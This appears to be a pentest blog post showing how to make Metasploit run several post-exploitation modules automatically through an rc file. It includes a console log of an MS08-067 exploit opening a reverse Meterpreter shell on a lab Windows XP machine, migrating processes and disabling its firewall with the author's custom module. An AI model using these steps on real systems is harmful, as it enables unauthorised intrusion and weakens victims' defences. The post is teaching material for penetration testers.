Automation is the name of the pentest game
Metasploit auto run scripts are great when you need a module to run automatically post exploitation. Getting a single script to run post meterpreter is pretty easy, but what if you wanted multiple post scripts to run? From the msfconsole prompt run: set AutoRunScript multi_console_command -rc “path/name of rc file”
msf > set AutoRunScript multi_console_command -rc /root/autoruncommands.rc
Inside of the rc file just list the commands one by one like so:
run post/windows/manage/migrate run post/windows/manage/killfw run post/windows/gather/checkvm
Now save the file autoruncommands.rc inside of the root folder. Don’t use killfw because you won’t find it in your install. It is a module I wrote to autokill the windows firewall.
Now lets watch it in action:
msf exploit(ms08_067_netapi) > exploit [*] Started reverse handler on 10.10.200.40:4444 [*] Automatically detecting the target... [*] Fingerprint: Windows XP - Service Pack 2 - lang:English [*] Selected Target: Windows XP SP2 English (AlwaysOn NX) [*] Attempting to trigger the vulnerability... [*] Sending stage (752128 bytes) to 10.10.101.11 [*] Meterpreter session 6 opened (10.10.200.40:4444 -> 10.10.101.11:1125) at 2012-04-22 17:58:16 -0400 meterpreter > [*] Session ID 6 (10.10.200.40:4444 -> 10.10.101.11:1125) processing AutoRunScript 'multi_console_command -rc /root/autoruncommands.rc' [*] Running Command List ... [*] Running command run post/windows/manage/migrate [*] Running module against XPVM-SP2 [*] Current server process: svchost.exe (1324) [*] Spawning notepad.exe process to migrate to [+] Migrating to 3984 [+] Successfully migrated to process 3984 [*] Running command run post/windows/manage/killfw [+] Killing Windows Firewall... [+] Done! [*] Running command run post/windows/gather/checkvm [*] Checking if XPVM-SP2 is a Virtual Machine ..... [*] This is a VMware Virtual Machine
- @QueensNutrition you guys carry shilajit or fulvric acid? 1 week ago
- @thevanishedpod Bummer.. but i look forward to the next. :) 1 month ago
- One minute they look innocent, the next minute they are looking for your help to hide the body... no one was harmed… twitter.com/i/web/status/1… 1 month ago
- @akolsuoicauqol Pass? 1 month ago
- @gabsmashh Sounds like a starbucks drink. Can i have a Grande triplescan please? 2 months ago
- @amyengineer @CiscoLive I would truly like to purchase some. Open an etsy please! :) 2 months ago
- An error has occurred; the feed is probably down. Try again later.